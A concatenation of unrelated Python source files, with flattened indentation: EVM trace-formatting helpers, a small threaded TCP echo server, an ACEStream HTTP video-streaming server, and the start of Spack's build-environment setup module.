gas: Tuple[int, int],
subcall: Dict = None,
) -> str:
if last_step["op"] in {"REVERT", "INVALID"} and _step_compare(step, last_step):
contract_color = color("bright red")
else:
contract_color = color("bright cyan") if not step["jumpDepth"] else color()
key = f"{color('dark white')}{contract_color}{step['fn']} {color('dark white')}"
left_bracket = f"{color('dark white')}["
right_bracket = f"{color('dark white')}]"
if subcall:
key = f"{key}[{color}{subcall['op']}{right_bracket} "
key = f"{key}{start}:{stop}{color}"
if gas:
if gas[0] == gas[1]:
gas_str = f"{color('bright yellow')}{gas[0]} gas"
else:
gas_str = f"{color('bright yellow')}{gas[0]} / {gas[1]} gas"
key = f"{key} {left_bracket}{gas_str}{right_bracket}"
if last_step["op"] == "SELFDESTRUCT":
key = f"{key} {left_bracket}{color('bright red')}SELFDESTRUCT{right_bracket}"
return key
def _step_external(
step: Dict,
last_step: Dict,
start: Union[str, int],
stop: Union[str, int],
gas: Tuple[int, int],
subcall: Dict,
expand: bool,
) -> str:
key = _step_internal(step, last_step, start, stop, gas, subcall)
if not expand:
return key
mode = black.FileMode(line_length=60)
result: OrderedDict = OrderedDict({key: {}})
result[key][f"address: {step['address']}"] = None
if "value" in subcall:
result[key][f"value: {subcall['value']}"] = None
if "inputs" not in subcall:
result[key][f"calldata: {subcall['calldata']}"] = None
if subcall["inputs"]:
result[key]["input arguments:"] = [
f"{k}: {black.format_str(str(v), mode=mode)}" for k, v in subcall["inputs"].items()
]
else:
result[key]["input arguments: None"] = None
if "return_value" in subcall:
value = subcall["return_value"]
if isinstance(value, tuple) and len(value) > 1:
result[key]["return values:"] = [black.format_str(str(i), mode=mode) for i in value]
else:
if isinstance(value, tuple):
value = value[0]
value_str = black.format_str(str(value), mode=mode)
result[key][f"return value: {value_str}"] = None
if "revert_msg" in subcall:
result[key][f"revert reason: {color('bright red')}{subcall['revert_msg']}{color}"] = None
return build_tree(result, multiline_pad=0).rstrip()
def _get_memory(step: Dict, idx: int) -> HexBytes:
offset = int(step["stack"][idx], 16)
length = int(step["stack"][idx - 1], 16)
return HexBytes("".join(step["memory"]))[offset : offset + length]
def _get_last_map(address: EthAddress, sig: str) -> Dict:
contract = state._find_contract(address)
last_map = {"address": EthAddress(address), "jumpDepth": 0, "name": None, "coverage": False}
if contract:
if contract.get_method(sig):
full_fn_name = f"{contract._name}.{contract.get_method(sig)}"
else:
full_fn_name = contract._name
last_map.update(
contract=contract,
function=contract.get_method_object(sig),
name=contract._name,
internal_calls=[full_fn_name],
path_map=contract._build.get("allSourcePaths"),
pc_map=contract._build.get("pcMap"),
)
if contract._project:
last_map["coverage"] = True
if contract._build["language"] == "Solidity":
last_map["active_branches"] = set()
else:
last_map.update(contract=None, internal_calls=[f"<UnknownContract>.{sig}"], pc_map=None)
return last_map
|
wrapper.py
|
import socket
from threading import Thread
def echo(name:str, client_id:int, data:str)->list:
""" Basic callback function that echos everything """
return data
class HRTPServer(object):
""" Server object """
def __init__(self, ip="0.0.0.0", port=8088, callback=None):
self.ip = ip
self.port = port
self.callback = callback
self.running = True
# start socket server
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.bind((self.ip, self.port))
self.socket.listen(1)
def listen(self, conn, addr):
message = []
name = "Unknown"
client_id = 0
message_count = 0
while True:
data = conn.recv(1024)
#skip on no data
if not data: break
# check if hello sent
if data.decode().strip() != "Hello" and message_count == 0:
conn.send(b"?\n")
conn.close()
break
if data.decode().strip() == "End":
conn.send(b"Goodbye\n")
conn.close()
break
# If Over sent, parse message
if data.decode().strip() == "Over":
# Do handshake
if name == "Unknown":
for line in message:
line = line.decode()
if line.split(" ")[0] == "Name:":
name = line.split(" ")[1]
conn.send(("Id: "+ str(client_id) + "\n").encode())
conn.send(b"Ready\nOver\n")
break
if name == "Unknown":
conn.send(b"Who?\n")
conn.send(b"Over\n")
else:
# Send data to callback function
response = self.callback(name, client_id, message[:-1])
for line in response:
conn.send((line + "\n").encode())
conn.send(b"Over\n")
message = []
message.append(data.strip())
message_count += 1
conn.close()
def start(self, v=False):
while self.running:
conn, addr = self.socket.accept()
if v:
print(f"{addr[0]} connected")
thread = Thread(target=self.listen, args=(conn, addr ))
thread.start()
|
VideoServer.py
|
#Embedded file name: ACEStream\Video\VideoServer.pyo
import sys
import time
import socket
import BaseHTTPServer
from SocketServer import ThreadingMixIn
from threading import RLock, Thread, currentThread
from traceback import print_stack, print_exc
import string
from cStringIO import StringIO
import os
from ACEStream.GlobalConfig import globalConfig
import ACEStream.Core.osutils
from ACEStream.Core.Utilities.logger import log, log_exc
DEBUG = False
DEBUGCONTENT = False
DEBUGWEBUI = False
DEBUGLOCK = False
DEBUGBASESERV = False
class ConnectionResetError(Exception):
pass
def bytestr2int(b):
if b == '':
return None
else:
return int(b)
class AbstractPathMapper():
def __init__(self):
pass
def get(self, path):
msg = 'AbstractPathMapper: Unknown path ' + path
stream = StringIO(msg)
streaminfo = {'mimetype': 'text/plain',
'stream': stream,
'length': len(msg)}
return streaminfo
class VideoHTTPServer(ThreadingMixIn, BaseHTTPServer.HTTPServer):
__single = None
def __init__(self, port):
if VideoHTTPServer.__single:
raise RuntimeError, 'HTTPServer is Singleton'
VideoHTTPServer.__single = self
self.port = port
if globalConfig.get_value('allow-non-local-client-connection'):
bind_address = ''
else:
bind_address = '127.0.0.1'
BaseHTTPServer.HTTPServer.__init__(self, (bind_address, self.port), SimpleServer)
self.daemon_threads = True
self.allow_reuse_address = True
self.lock = RLock()
self.urlpath2streaminfo = {}
self.mappers = []
self.errorcallback = None
self.statuscallback = None
def getInstance(*args, **kw):
if VideoHTTPServer.__single is None:
VideoHTTPServer(*args, **kw)
return VideoHTTPServer.__single
getInstance = staticmethod(getInstance)
def background_serve(self):
name = 'VideoHTTPServerThread-1'
self.thread2 = Thread(target=self.serve_forever, name=name)
self.thread2.setDaemon(True)
self.thread2.start()
def register(self, errorcallback, statuscallback):
self.errorcallback = errorcallback
self.statuscallback = statuscallback
def set_inputstream(self, streaminfo, urlpath):
self.lock.acquire()
if DEBUGLOCK:
log('videoserver::set_inputstream: urlpath', urlpath, 'streaminfo', streaminfo, 'thread', currentThread().getName())
if self.urlpath2streaminfo.has_key(urlpath):
if DEBUGLOCK:
log('videoserver::set_inputstream: path exists, delete old: urlpath', urlpath, 'thread', currentThread().getName())
self.del_inputstream(urlpath)
streaminfo['lock'] = RLock()
self.urlpath2streaminfo[urlpath] = streaminfo
self.lock.release()
def acquire_inputstream(self, urlpath):
global DEBUG
if urlpath is None:
return
streaminfo = None
for mapper in self.mappers:
streaminfo = mapper.get(urlpath)
if streaminfo is not None and (streaminfo['statuscode'] == 200 or streaminfo['statuscode'] == 301):
return streaminfo
self.lock.acquire()
if DEBUGLOCK:
log('VideoServer::acquire_inputstream: lock done', urlpath, currentThread().getName())
try:
streaminfo = self.urlpath2streaminfo.get(urlpath, None)
if DEBUG:
log('videoserver::acquire_inputstream: got streaminfo: urlpath', urlpath, 'streaminfo', streaminfo)
finally:
if DEBUGLOCK:
log('VideoServer::acquire_inputstream: unlock', urlpath, currentThread().getName())
self.lock.release()
if streaminfo is not None and 'lock' in streaminfo:
if DEBUGLOCK:
log('VideoServer::acquire_inputstream: lock stream: urlpath', urlpath, 'streaminfo', streaminfo, 'thread', currentThread().getName())
streaminfo['lock'].acquire()
if DEBUGLOCK:
log('VideoServer::acquire_inputstream: lock stream done: urlpath', urlpath, 'thread', currentThread().getName())
return streaminfo
def release_inputstream(self, urlpath):
if DEBUGLOCK:
log('VideoServer::release_inputstream: lock', urlpath, currentThread().getName())
self.lock.acquire()
try:
streaminfo = self.urlpath2streaminfo.get(urlpath, None)
finally:
if DEBUGLOCK:
log('VideoServer::release_inputstream: unlock', urlpath, currentThread().getName())
self.lock.release()
if streaminfo is not None and 'lock' in streaminfo:
if DEBUGLOCK:
log('VideoServer::release_inputstream: unlock stream: urlpath', urlpath, 'streaminfo', streaminfo, 'thread', currentThread().getName())
streaminfo['lock'].release()
def del_inputstream(self, urlpath):
if DEBUGLOCK:
log('VideoServer::del_inputstream: enter', urlpath)
streaminfo = self.acquire_inputstream(urlpath)
self.lock.acquire()
if DEBUGLOCK:
log('VideoServer::del_inputstream: lock', urlpath, currentThread().getName())
try:
del self.urlpath2streaminfo[urlpath]
except KeyError:
if DEBUGLOCK:
log('videoserver::del_inputstream: path not found: urlpath', urlpath)
finally:
if DEBUGLOCK:
log('VideoServer::del_inputstream: unlock', urlpath, currentThread().getName())
self.lock.release()
if streaminfo is not None and 'lock' in streaminfo:
if DEBUGLOCK:
log('VideoServer::del_inputstream: stream: unlock', urlpath, currentThread().getName())
streaminfo['lock'].release()
def get_port(self):
return self.port
def add_path_mapper(self, mapper):
self.mappers.append(mapper)
def shutdown(self):
if DEBUG:
print >> sys.stderr, 'videoserv: Shutting down HTTP'
self.socket.close()
def handle_error(self, request, client_address):
if DEBUGBASESERV:
print >> sys.stderr, 'VideoHTTPServer: handle_error', request, client_address
log_exc()
class SimpleServer(BaseHTTPServer.BaseHTTPRequestHandler):
RANGE_REQUESTS_ENABLED = True
def log_message(self, format, *args):
pass
def do_GET(self):
global DEBUG
try:
if self.path.startswith('/webUI'):
DEBUG = DEBUGWEBUI
else:
DEBUG = DEBUGCONTENT
if DEBUG:
log('videoserv: do_GET: Got request', self.path, self.headers.getheader('range'), currentThread().getName())
nbytes2send = None
nbyteswritten = 0
try:
streaminfo = self.server.acquire_inputstream(self.path)
except:
streaminfo = None
if self.request_version == 'HTTP/1.1':
self.protocol_version = 'HTTP/1.1'
try:
if streaminfo is None or 'statuscode' in streaminfo and streaminfo['statuscode'] != 200:
if streaminfo is None:
streaminfo = {'statuscode': 500,
'statusmsg': "Internal Server Error, couldn't find resource"}
if DEBUG:
log('videoserv: do_GET: Cannot serve request', streaminfo['statuscode'], currentThread().getName())
self.send_response(streaminfo['statuscode'])
if streaminfo['statuscode'] == 301:
self.send_header('Location', streaminfo['statusmsg'])
self.end_headers()
else:
self.send_header('Content-Type', 'text/plain')
self.send_header('Content-Length', len(streaminfo['statusmsg']))
self.end_headers()
self.wfile.write(streaminfo['statusmsg'])
return
mimetype = streaminfo['mimetype']
stream = streaminfo['stream']
length = streaminfo['length']
if 'blocksize' in streaminfo:
blocksize = streaminfo['blocksize']
else:
blocksize = 65536
if 'svc' in streaminfo:
svc = streaminfo['svc']
else:
svc = False
if DEBUG:
log('videoserv: do_GET: MIME type is', mimetype, 'length', length, 'blocksize', blocksize, currentThread().getName())
firstbyte = 0
if length is not None:
lastbyte = length - 1
else:
lastbyte = None
range = self.headers.getheader('range')
if self.RANGE_REQUESTS_ENABLED and length and range:
bad = False
type, seek = string.split(range, '=')
if seek.find(',') != -1:
bad = True
else:
firstbytestr, lastbytestr = string.split(seek, '-')
firstbyte = bytestr2int(firstbytestr)
lastbyte = bytestr2int(lastbytestr)
if length is None:
bad = True
elif firstbyte is None and lastbyte is None:
bad = True
elif firstbyte >= length:
bad = True
elif lastbyte >= length:
if firstbyte is None:
lastbyte = length - 1
else:
bad = True
if bad:
self.send_response(416)
if length is None:
crheader = 'bytes */*'
else:
crheader = 'bytes */' + str(length)
self.send_header('Content-Range', crheader)
self.end_headers()
return
if firstbyte is not None and lastbyte is None:
nbytes2send = length - firstbyte
lastbyte = length - 1
elif firstbyte is None and lastbyte is not None:
nbytes2send = lastbyte
firstbyte = length - lastbyte
lastbyte = length - 1
else:
nbytes2send = lastbyte + 1 - firstbyte
crheader = 'bytes ' + str(firstbyte) + '-' + str(lastbyte) + '/' + str(length)
if DEBUG:
log('VideoServer::do_Get: send response 206,', crheader)
self.send_response(206)
self.send_header('Content-Range', crheader)
else:
nbytes2send = length
self.send_response(200)
if DEBUG:
log('videoserv: do_GET: final range', firstbyte, lastbyte, nbytes2send, currentThread().getName())
if not svc:
try:
stream.seek(firstbyte)
except:
log_exc()
if self.request_version == 'HTTP/1.1':
self.send_header('Connection', 'Keep-Alive')
self.send_header('Keep-Alive', 'timeout=15, max=100')
self.send_header('Content-Type', mimetype)
self.send_header('Accept-Ranges', 'bytes')
try:
if streaminfo.has_key('bitrate') and streaminfo['bitrate'] is not None and length is not None:
bitrate = streaminfo['bitrate']
estduration = float(length) / float(bitrate)
self.send_header('X-Content-Duration', estduration)
except:
log_exc()
if length is not None:
self.send_header('Content-Length', nbytes2send)
else:
self.send_header('Transfer-Encoding', 'chunked')
self.end_headers()
if svc:
data = stream.read()
if len(data) > 0:
self.wfile.write(data)
elif len(data) == 0:
if DEBUG:
log('videoserv: svc: stream.read() no data')
else:
done = False
while True:
tt = time.time()
data = stream.read(blocksize)
data_len = len(data)
if data_len == 0:
done = True
tt = time.time() - tt
if DEBUG:
log('videoserver::get: read done: blocksize', blocksize, 'length', length, 'len(data)', data_len, 'time', tt, 'thread', currentThread().getName())
if length is None:
self.wfile.write('%x\r\n' % data_len)
if data_len > 0:
tt = time.time()
if length is not None and nbyteswritten + data_len > nbytes2send:
endlen = nbytes2send - nbyteswritten
if endlen != 0:
self.wfile.write(data[:endlen])
done = True
nbyteswritten += endlen
else:
try:
playback_started = stream.stream.mt.playback_started
bitrate = stream.stream.mt.videostatus.bitrate
except:
playback_started = False
bitrate = None
if bitrate is None:
try:
self.wfile.write(data)
except:
raise ConnectionResetError()
else:
delay = 0.01
speed = bitrate * 8
chunk_size = bitrate
pos = 0
while pos < data_len:
chunk = data[pos:pos + chunk_size]
try:
self.wfile.write(chunk)
except:
raise ConnectionResetError()
if DEBUG:
log('videoserver::get: write chunk: pos', pos, 'chunk_size', chunk_size, 'delay', delay, 'speed', speed, 'thread', currentThread().getName())
pos += chunk_size
nbyteswritten += data_len
if DEBUG:
log('videoserver::get: write done: nbyteswritten', nbyteswritten, 'time', time.time() - tt, 'thread', currentThread().getName())
if length is None:
self.wfile.write('\r\n')
if done:
if DEBUG:
log('videoserver::get: stream reached EOF: thread', currentThread().getName())
break
if DEBUG and nbyteswritten != nbytes2send:
log('videoserver::get: sent wrong amount: wanted', nbytes2send, 'got', nbyteswritten, 'thread', currentThread().getName())
if not range:
stream.close()
if self.server.statuscallback is not None:
self.server.statuscallback('Done')
except ConnectionResetError:
if DEBUG:
log('videoserver::get: connection reset')
except:
log_exc()
finally:
self.server.release_inputstream(self.path)
except socket.error as e2:
if DEBUG:
log('videoserv: SocketError occured while serving', currentThread().getName())
log_exc()
except Exception as e:
if DEBUG:
log('videoserv: Error occured while serving', currentThread().getName())
log_exc()
self.error(e, self.path)
def error(self, e, url):
if self.server.errorcallback is not None:
self.server.errorcallback(e, url)
else:
log_exc()
if self.server.statuscallback is not None:
self.server.statuscallback('Error playing video:' + str(e))
class VideoRawVLCServer():
__single = None
def __init__(self):
if VideoRawVLCServer.__single:
raise RuntimeError, 'VideoRawVLCServer is Singleton'
VideoRawVLCServer.__single = self
self.lock = RLock()
self.oldsid = None
self.sid2streaminfo = {}
def getInstance(*args, **kw):
if VideoRawVLCServer.__single is None:
VideoRawVLCServer(*args, **kw)
return VideoRawVLCServer.__single
getInstance = staticmethod(getInstance)
def set_inputstream(self, streaminfo, sid):
self.lock.acquire()
try:
print >> sys.stderr, 'VLCRawServer: setting sid', sid
self.sid2streaminfo[sid] = streaminfo
finally:
self.lock.release()
def get_inputstream(self, sid):
self.lock.acquire()
try:
return self.sid2streaminfo[sid]
finally:
self.lock.release()
def shutdown(self):
pass
def ReadDataCallback(self, bufc, buflen, sid):
try:
if self.oldsid is not None and self.oldsid != sid:
oldstream = self.sid2streaminfo[self.oldsid]['stream']
del self.sid2streaminfo[self.oldsid]
try:
oldstream.close()
except:
log_exc()
self.oldsid = sid
streaminfo = self.get_inputstream(sid)
data = streaminfo['stream'].read(buflen)
size = len(data)
if size == 0:
return 0
bufc[0:size] = data
return size
except:
log_exc()
return -1
def SeekDataCallback(self, pos, sid):
try:
if True:
streaminfo = self.get_inputstream(sid)
streaminfo['stream'].seek(pos, os.SEEK_SET)
return 0
return -1
except:
log_exc()
return -1
class MultiHTTPServer(ThreadingMixIn, VideoHTTPServer):
__single = None
def __init__(self, port):
if MultiHTTPServer.__single:
raise RuntimeError, 'MultiHTTPServer is Singleton'
MultiHTTPServer.__single = self
self.port = port
BaseHTTPServer.HTTPServer.__init__(self, ('127.0.0.1', self.port), SimpleServer)
self.daemon_threads = True
self.allow_reuse_address = True
self.lock = RLock()
self.urlpath2streaminfo = {}
self.mappers = []
self.errorcallback = None
self.statuscallback = None
def background_serve(self):
name = 'MultiHTTPServerThread-1'
self.thread2 = Thread(target=self.serve_forever, name=name)
self.thread2.setDaemon(True)
self.thread2.start()
|
build_environment.py
|
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
"""
This module contains all routines related to setting up the package
build environment. All of this is set up by package.py just before
install() is called.
There are two parts to the build environment:
1. Python build environment (i.e. install() method)
This is how things are set up when install() is called. Spack
takes advantage of each package being in its own module by adding a
bunch of command-like functions (like configure(), make(), etc.) in
the package's module scope. Ths allows package writers to call
them all directly in Package.install() without writing 'self.'
everywhere. No, this isn't Pythonic. Yes, it makes the code more
readable and more like the shell script from which someone is
likely porting.
2. Build execution environment
This is the set of environment variables, like PATH, CC, CXX,
etc. that control the build. There are also a number of
environment variables used to pass information (like RPATHs and
other information about dependencies) to Spack's compiler wrappers.
All of these env vars are also set up here.
Skimming this module is a nice way to get acquainted with the types of
calls you can make from within the install() function.
"""
import re
import inspect
import multiprocessing
import os
import shutil
import sys
import traceback
import types
from six import StringIO
import llnl.util.tty as tty
from llnl.util.tty.color import cescape, colorize
from llnl.util.filesystem import mkdirp, install, install_tree
from llnl.util.lang import dedupe
import spack.build_systems.cmake
import spack.build_systems.meson
import spack.config
import spack.main
import spack.paths
import spack.schema.environment
import spack.store
import spack.architecture as arch
from spack.util.string import plural
from spack.util.environment import (
env_flag, filter_system_paths, get_path, is_system_path,
EnvironmentModifications, validate, preserve_environment)
from spack.util.environment import system_dirs
from spack.error import NoLibrariesError, NoHeadersError
from spack.util.executable import Executable
from spack.util.module_cmd import load_module, get_path_from_module, module
from spack.util.log_parse import parse_log_events, make_log_context
#
# This can be set by the user to globally disable parallel builds.
#
SPACK_NO_PARALLEL_MAKE = 'SPACK_NO_PARALLEL_MAKE'
#
# These environment variables are set by
# set_build_environment_variables and used to pass parameters to
# Spack's compiler wrappers.
#
SPACK_ENV_PATH = 'SPACK_ENV_PATH'
SPACK_INCLUDE_DIRS = 'SPACK_INCLUDE_DIRS'
SPACK_LINK_DIRS = 'SPACK_LINK_DIRS'
SPACK_RPATH_DIRS = 'SPACK_RPATH_DIRS'
SPACK_RPATH_DEPS = 'SPACK_RPATH_DEPS'
SPACK_LINK_DEPS = 'SPACK_LINK_DEPS'
SPACK_PREFIX = 'SPACK_PREFIX'
SPACK_INSTALL = 'SPACK_INSTALL'
SPACK_DEBUG = 'SPACK_DEBUG'
SPACK_SHORT_SPEC = 'SPACK_SHORT_SPEC'
SPACK_DEBUG_LOG_ID = 'SPACK_DEBUG_LOG_ID'
SPACK_DEBUG_LOG_DIR = 'SPACK_DEBUG_LOG_DIR'
SPACK_CCACHE_BINARY = 'SPACK_CCACHE_BINARY'
SPACK_SYSTEM_DIRS = 'SPACK_SYSTEM_DIRS'
# Platform-specific library suffix.
dso_suffix = 'dylib' if sys.platform == 'darwin' else 'so'
class MakeExecutable(Executable):
"""Special callable executable object for make so the user can specify
parallelism options on a per-invocation basis. Specifying
'parallel' to the call will override whatever the package's
global setting is, so you can either default to true or false and
override particular calls. Specifying 'jobs_env' to a particular
call will name an environment variable which will be set to the
parallelism level (without affecting the normal invocation with
-j).
Note that if the SPACK_NO_PARALLEL_MAKE env var is set it overrides
everything.
"""
def __init__(self, name, jobs):
super(MakeExecutable, self).__init__(name)
self.jobs = jobs
def __call__(self, *args, **kwargs):
"""parallel, and jobs_env from kwargs are swallowed and used here;
remaining arguments are passed through to the superclass.
"""
disable = env_flag(SPACK_NO_PARALLEL_MAKE)
parallel = (not disable) and kwargs.pop('parallel', self.jobs > 1)
if parallel:
args = ('-j{0}'.format(self.jobs),) + args
jobs_env = kwargs.pop('jobs_env', None)
if jobs_env:
# Caller wants us to set an environment variable to
# control the parallelism.
kwargs['extra_env'] = {jobs_env: str(self.jobs)}
return super(MakeExecutable, self).__call__(*args, **kwargs)
def clean_environment():
# Stuff in here sanitizes the build environment to eliminate
# anything the user has set that may interfere. We apply it immediately
# unlike the other functions so it doesn't overwrite what the modules load.
env = EnvironmentModifications()
# Remove these vars from the environment during build because they
# can affect how some packages find libraries. We want to make
# sure that builds never pull in unintended external dependencies.
env.unset('LD_LIBRARY_PATH')
env.unset('LIBRARY_PATH')
env.unset('CPATH')
env.unset('LD_RUN_PATH')
env.unset('DYLD_LIBRARY_PATH')
env.unset('DYLD_FALLBACK_LIBRARY_PATH')
# On Cray "cluster" systems, unset CRAY_LD_LIBRARY_PATH to avoid
# interference with Spack dependencies.
# CNL requires these variables to be set (or at least some of them,
# depending on the CNL version).
hostarch = arch.Arch(arch.platform(), 'default_os', 'default_target')
on_cray = str(hostarch.platform) == 'cray'
using_cnl = re.match(r'cnl\d+', str(hostarch.os))
if on_cray and not using_cnl:
env.unset('CRAY_LD_LIBRARY_PATH')
for varname in os.environ.keys():
if 'PKGCONF' in varname:
env.unset(varname)
# Unset the following variables because they can affect installation of
# Autotools and CMake packages.
build_system_vars = [
'CC', 'CFLAGS', 'CPP', 'CPPFLAGS', # C variables
'CXX', 'CCC', 'CXXFLAGS', 'CXXCPP', # C++ variables
'F77', 'FFLAGS', 'FLIBS', # Fortran77 variables
'FC', 'FCFLAGS', 'FCLIBS', # Fortran variables
'LDFLAGS', 'LIBS' # linker variables
]
for v in build_system_vars:
env.unset(v)
# Unset mpi environment vars. These flags should only be set by
# mpi providers for packages with mpi dependencies
mpi_vars = [
'MPICC', 'MPICXX', 'MPIFC', 'MPIF77', 'MPIF90'
]
for v in mpi_vars:
env.unset(v)
build_lang = spack.config.get('config:build_language')
if build_lang:
# Override language-related variables. This can be used to force
# English compiler messages etc., which allows parse_log_events to
# show useful matches.
env.set('LC_ALL', build_lang)
# Remove any macports installs from the PATH. The macports ld can
# cause conflicts with the built-in linker on el capitan. Solves
# assembler issues, e.g.:
# suffix or operands invalid for `movq'"
path = get_path('PATH')
for p in path:
if '/macports/' in p:
env.remove_path('PATH', p)
env.apply_modifications()
def set_compiler_environment_variables(pkg, env):
assert pkg.spec.concrete
compiler = pkg.compiler
spec = pkg.spec
# Make sure the executables for this compiler exist
compiler.verify_executables()
# Set compiler variables used by CMake and autotools
assert all(key in compiler.link_paths for key in (
'cc', 'cxx', 'f77', 'fc'))
# Populate an object with the list of environment modifications
# and return it
# TODO : add additional kwargs for better diagnostics, like requestor,
# ttyout, ttyerr, etc.
link_dir = spack.paths.build_env_path
# Set SPACK compiler variables so that our wrapper knows what to call
if compiler.cc:
env.set('SPACK_CC', compiler.cc)
env.set('CC', os.path.join(link_dir, compiler.link_paths['cc']))
if compiler.cxx:
env.set('SPACK_CXX', compiler.cxx)
env.set('CXX', os.path.join(link_dir, compiler.link_paths['cxx']))
if compiler.f77:
env.set('SPACK_F77', compiler.f77)
env.set('F77', os.path.join(link_dir, compiler.link_paths['f77']))
if compiler.fc:
env.set('SPACK_FC', compiler.fc)
env.set('FC', os.path.join(link_dir, compiler.link_paths['fc']))
# Set SPACK compiler rpath flags so that our wrapper knows what to use
env.set('SPACK_CC_RPATH_ARG', compiler.cc_rpath_arg)
env.set('SPACK_CXX_RPATH_ARG', compiler.cxx_rpath_arg)
env.set('SPACK_F77_RPATH_ARG', compiler.f77_rpath_arg)
env.set('SPACK_FC_RPATH_ARG', compiler.fc_rpath_arg)
env.set('SPACK_LINKER_ARG', compiler.linker_arg)
# Check whether we want to force RPATH or RUNPATH
if spack.config.get('config:shared_linking') == 'rpath':
env.set('SPACK_DTAGS_TO_STRIP', compiler.enable_new_dtags)
env.set('SPACK_DTAGS_TO_ADD', compiler.disable_new_dtags)
else:
env.set('SPACK_DTAGS_TO_STRIP', compiler.disable_new_dtags)
env.set('SPACK_DTAGS_TO_ADD', compiler.enable_new_dtags)
# Set the target parameters that the compiler will add
isa_arg = spec.architecture.target.optimization_flags(compiler)
env.set('SPACK_TARGET_ARGS', isa_arg)
# Trap spack-tracked compiler flags as appropriate.
# env_flags are easy to accidentally override.
inject_flags = {}
env_flags = {}
build_system_flags = {}
for flag in spack.spec.FlagMap.valid_compiler_flags():
# Always convert flag_handler to function type.
# This avoids discrepencies in calling conventions between functions
# and methods, or between bound and unbound methods in python 2.
# We cannot effectively convert everything to a bound method, which
# would be the simpler solution.
if isinstance(pkg.flag_handler, types.FunctionType):
handler = pkg.flag_handler
else:
if sys.version_info >= (3, 0):
handler = pkg.flag_handler.__func__
else:
handler = pkg.flag_handler.im_func
injf, envf, bsf = handler(pkg, flag, spec.compiler_flags[flag])
inject_flags[flag] = injf or []
env_flags[flag] = envf or []
build_system_flags[flag] = bsf or []
# Place compiler flags as specified by flag_handler
for flag in spack.spec.FlagMap.valid_compiler_flags():
# Concreteness guarantees key safety here
if inject_flags[flag]:
# variables SPACK_<FLAG> inject flags through wrapper
var_name = 'SPACK_{0}'.format(flag.upper())
env.set(var_name, ' '.join(f for f in inject_flags[flag]))
if env_flags[flag]:
# implicit variables
env.set(flag.upper(), ' '.join(f for f in env_flags[flag]))
pkg.flags_to_build_system_args(build_system_flags)
env.set('SPACK_COMPILER_SPEC', str(spec.compiler))
env.set('SPACK_SYSTEM_DIRS', ':'.join(system_dirs))
compiler.setup_custom_environment(pkg, env)
return env
def set_build_environment_variables(pkg, env, dirty):
"""Ensure a clean install environment when we build packages.
This involves unsetting pesky environment variables that may
affect the build. It also involves setting environment variables
used by Spack's compiler wrappers.
Args:
pkg: The package we are building
env: The build environment
dirty (bool): Skip unsetting the user's environment settings
"""
# Gather information about various types of dependencies
build_deps = set(pkg.spec.dependencies(deptype=('build', 'test')))
link_deps = set(pkg.spec.traverse(root=False, deptype=('link')))
build_link_deps = build_deps | link_deps
rpath_deps = get_rpath_deps(pkg)
link_dirs = []
include_dirs = []
rpath_dirs = []
# The top-level package is always RPATHed. It hasn't been installed yet
# so the RPATHs are added unconditionally (e.g. even though lib64/ may
# not be created for the install).
for libdir in ['lib', 'lib64']:
lib_path = os.path.join(pkg.prefix, libdir)
rpath_dirs.append(lib_path)
# Set up link, include, RPATH directories that are passed to the
# compiler wrapper
for dep in link_deps:
if is_system_path(dep.prefix):
continue
query = pkg.spec[dep.name]
dep_link_dirs = list()
try:
dep_link_dirs.extend(query.libs.directories)
except NoLibrariesError:
tty.debug("No libraries found for {0}".format(dep.name))
for default_lib_dir in ['lib', 'lib64']:
default_lib_prefix = os.path.join(dep.prefix, default_lib_dir)
if os.path.isdir(default_lib_prefix):
dep_link_dirs.append(default_lib_prefix)
link_dirs.extend(dep_link_dirs)
if dep in rpath_deps:
rpath_dirs.extend(dep_link_dirs)
try:
include_dirs.extend(query.headers.directories)
except NoHeadersError:
tty.debug("No headers found for {0}".format(dep.name))
link_dirs = list(dedupe(filter_system_paths(link_dirs)))
include_dirs = list(dedupe(filter_system_paths(include_dirs)))
rpath_dirs = list(dedupe(filter_system_paths(rpath_dirs)))
env.set(SPACK_LINK_DIRS, ':'.join(link_dirs))
env.set(SPACK_INCLUDE_DIRS, ':'.join(include_dirs))
env.set(SPACK_RPATH_DIRS, ':'.join(rpath_dirs))
build_prefixes = [dep.prefix for dep in build_deps]
build_link_prefixes = [dep.prefix for dep in build_link_deps]
# add run-time dependencies of direct build-time dependencies:
for build_dep in build_deps:
for run_dep in build_dep.traverse(deptype='run'):
build_prefixes.append(run_dep.prefix)
# Filter out system paths: ['/', '/usr', '/usr/local']
# These paths can be introduced into the build when an external package
# is added as a dependency. The problem with these paths is that they often
# contain hundreds of other packages installed in the same directory.
# If these paths come first, they can overshadow Spack installations.
build_prefixes = filter_system_paths(build_prefixes)
build_link_prefixes = filter_system_paths(build_link_prefixes)
# Add dependencies to CMAKE_PREFIX_PATH
env.set_path('CMAKE_PREFIX_PATH', build_link_prefixes)
# Set environment variables if specified for
# the given compiler
compiler = pkg.compiler
env.extend(spack.schema.environment.parse(compiler.environment))
if compiler.extra_rpaths:
extra_rpaths = ':'.join(compiler.extra_rpaths)
env.set('SPACK_COMPILER_EXTRA_RPATHS', extra_rpaths)
# Add bin directories from dependencies to the PATH for the build.
for prefix in build_prefixes:
for dirname in ['bin', 'bin64']:
bin_dir = os.path.join(prefix, dirname)
if os.path.isdir(bin_dir):
env.prepend_path('PATH', bin_dir)
# Add spack build environment path with compiler wrappers first in
# the path. We add the compiler wrapper path, which includes default
# wrappers (cc, c++, f77, f90), AND a subdirectory containing
# compiler-specific symlinks. The latter ensures that builds that
# are sensitive to the *name* of the compiler see the right name when
# we're building with the wrappers.
#
# Conflicts on case-insensitive systems (like "CC" and "cc") are
# handled by putting one in the <build_env_path>/case-insensitive
# directory. Add that to the path too.
env_paths = []
compiler_specific = os.path.join(
spack.paths.build_env_path, pkg.compiler.name)
for item in [spack.paths.build_env_path, compiler_specific]:
env_paths.append(item)
ci = os.path.join(item, 'case-insensitive')
if os.path.isdir(ci):
env_paths.append(ci)
for item in env_paths:
env.prepend_path('PATH', item)
env.set_path(SPACK_ENV_PATH, env_paths)
# Working directory for the spack command itself, for debug logs.
if spack.config.get('config:debug'):
env.set(SPACK_DEBUG, 'TRUE')
env.set(SPACK_SHORT_SPEC, pkg.spec.short_spec)
env.set(SPACK_DEBUG_LOG_ID, pkg.spec.format('{name}-{hash:7}'))
env.set(SPACK_DEBUG_LOG_DIR, spack.main.spack_working_dir)
